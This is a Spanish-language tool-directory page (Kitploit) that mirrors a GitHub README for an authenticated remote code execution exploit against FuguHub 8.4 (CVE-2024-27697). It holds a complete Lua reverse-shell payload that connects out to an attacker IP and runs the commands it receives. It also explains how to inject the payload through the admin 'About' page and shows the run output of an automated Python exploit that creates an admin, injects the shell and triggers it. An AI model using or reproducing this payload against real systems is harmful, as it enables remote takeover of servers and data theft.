Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
FuguHub-8.4-Authenticated-RCE-CVE-2024-27697 — Ejecución de código arbitrario en FuguHub 8.4 | Kitploit
Herramientas/GitHubGitHub/sanjindedic/fuguhub-8.4-authenticated-rce-cve-2024-27697
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed TeamingHerramienta de Acceso RemotoDesarrollo de Payloads

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
sanjindedic/fuguhub-8.4-authenticated-rce-cve-2024-27697

FuguHub-8.4-Authenticated-RCE-CVE-2024-27697

Ejecución de código arbitrario en FuguHub 8.4

Ver Repositorio
101hace 2 añosAún no revisado

FuguHub 8.4 RCE Autenticado

Fuguhub es un software de servidor multimedia en la nube. La versión probada fue la versión Debian en este enlace: https://fuguhub.com/articles/FuguHub-for-Debian Un problema en Real Time Logic LLC FuguHub v.8.4 permite a un atacante local ejecutar código arbitrario mediante un script manipulado en la página 'About' del panel de administrador.

Captura de pantalla mostrando la página de descarga de FuguHub
Captura de pantalla mostrando la página de descarga de FuguHub

Pasos de instalación:

root@kitploit:~
wget FuguHub.com/install/FuguHub.linux.install
chmod +x FuguHub.linux.install
sudo ./FuguHub.linux.install

Descripción de la vulnerabilidad

La página 'About' es una página Lua editable cuyo contenido puede cambiarse a través del panel de administrador. La vulnerabilidad inserta una reverse shell escrita en Lua en la página 'About', que es visible tanto para usuarios conectados como no conectados.

Captura de pantalla mostrando la página 'About' que es editable por el administrador de FuguHub
Captura de pantalla mostrando la página 'About' que es editable por el administrador de FuguHub

Proceso de explotación

FuguHub solicita al usuario crear un usuario administrador; esto también se puede hacer en esta página: http://127.0.0.1/rtl/protected/admin/ Una vez creado, el administrador puede personalizar el servidor en este enlace: http://127.0.0.1/rtl/protected/admin/customize.lsp esto permite al usuario editar la página About, la cual vemos que tiene una sección de código Lua donde podemos inyectar código.

Captura de pantalla mostrando código lsp editable que se ejecuta en el lado del servidor para devolver la versión del software, este es el punto de inserción para la reverse shell
Captura de pantalla mostrando código lsp editable que se ejecuta en el lado del servidor para devolver la versión del software, este es el punto de inserción para la reverse shell

Payload

Aquí hay un ejemplo de payload:

root@kitploit:~
<?lsp if request:method() == "GET" then ?>
    <?lsp 
        local host, port = "192.168.0.107", 4444
        local socket = require("socket")
        local tcp = socket.tcp()
        local io = require("io")
        local connection, err = tcp:connect(host, port)
        
        if not connection then
            print("Error connecting: " .. err)
            return
        end
        
        while true do
            local cmd, status, partial = tcp:receive()
            if status == "closed" or status == "timeout" then break end
            if cmd then
                local f = io.popen(cmd, "r")
                local s = f:read("*a")
                f:close()
                tcp:send(s)
            end
        end
        
        tcp:close()
    ?>
<?lsp else ?>
    Wrong request method, goodBye! 
<?lsp end ?>

Un payload alternativo de una sola línea se puede obtener en revshells.com

Captura de pantalla de la reverse shell Lua de revshells.com
Captura de pantalla de la reverse shell Lua de revshells.com

Exploit en Python

Durante mis intentos de automatizar este exploit, encontré CVE-2023-24078, que descubrió una vulnerabilidad de subida de archivos en FuguHub. Ese exploit se hizo usando Python y tenía inicio de sesión y creación de cuentas automatizados. Utilicé la parte de autenticación de ese exploit y luego agregué código que explota mi punto de inserción recién descubierto en la página customize.lsp. Mi exploit en Python está incluido en el repositorio como exploit.py

Uso del exploit en Python

usage: exploit.py [-h] -r RHOST [-rp RPORT] -l LHOST -p LPORT

root@kitploit:~
┌──(kali㉿kali)-[~/pg/hub]
└─$ python3 exploit.py -r 192.168.XXX.XXX -rp 80 -l 192.168.XXX.XXX -p 5555
[*] Checking for admin user...
[+] No admin user exists yet, creating account with admin:password
[+] User created!
[+] Logging in...
[+] Success! Injecting the reverse shell...
[+] Successfully injected the reverse shell into the About page.
[+] Triggering the reverse shell, check your listener...
Descargar herramienta